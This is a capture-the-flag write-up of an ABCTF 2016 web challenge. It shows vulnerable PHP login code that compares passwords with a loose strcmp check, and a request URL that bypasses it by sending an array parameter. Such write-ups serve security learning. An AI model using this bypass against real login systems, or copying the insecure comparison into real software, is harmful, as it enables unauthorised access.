PHP strcmp Bypass (ABCTF2016 – L33t H4xx0r)

Another one of the ABCTF challenges this year involved a login page and bypassing PHP strcmp.

PHP strcmp Bypass – Introduction

This was a unique CTF authentication bypass challenge, and I just had to share it!

I recommend checking out ABCTF if you ever get a chance, as it is my favorite beginner-friendly CTF.

Finally, take a look at the PHP strcmp docs if you want to follow along at home.

YouTube Version of this Post

If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.

That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!

The Challenge

At first glance, the login page seemed fairly simple.

Not so hidden within the source of the page was where I could find the source for the form.

	<!-- source at source.txt -->

The source.txt file was straightforward, and was doing a simple strcmp between our GET request and the $PASSWORD variable.

<?php
	$FLAGWEB6 = (file_get_contents("flag.txt"));
	$PASSWORD =  (file_get_contents("flag.txt")); //haha


	if(isset($_GET['password'])){
	
	if(strcmp($PASSWORD, $_GET['password']) == 0){
			$success = true;
		}
		else{
			$success = false;
		}

	}
	else {
		$success = false;
	}
	
	

?>

Authentication Bypass

From here, I actually spent quite awhile trying to pass a reference to $FLAGWEB6 in my get request, since those two variables would be the same. Unfortunately, I was never able to get this to work (contact me if I was just missing something silly here!).

Unable to make any headway on that front, I then took a look back at the hint provided with the challenge.

Some ways of comparing two strings are very insecure.

After a bit more research, it seemed that strcmp had some issues when comparing a string to something else.

If I set $_GET[‘password’] equal to an empty array, then strcmp would return a NULL. Due to some inherent weaknesses in PHP’s comparisons, NULL == 0 will return true (more info).

With this in mind, I sent the following request to the login page.

http://yrmyzscnvh.abctf.xyz/web6/?password[]=%22%22

Once I sent the request, I received the flag and the subsequent 70 points.

PHP strcmp Bypass – Conclusion

While this wasn’t a difficult challenge, I had a lot of fun with this bypass.

This is something that I might put in a future CTF challenge of my own, so be on the lookout for that!

Ray Doyle

Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.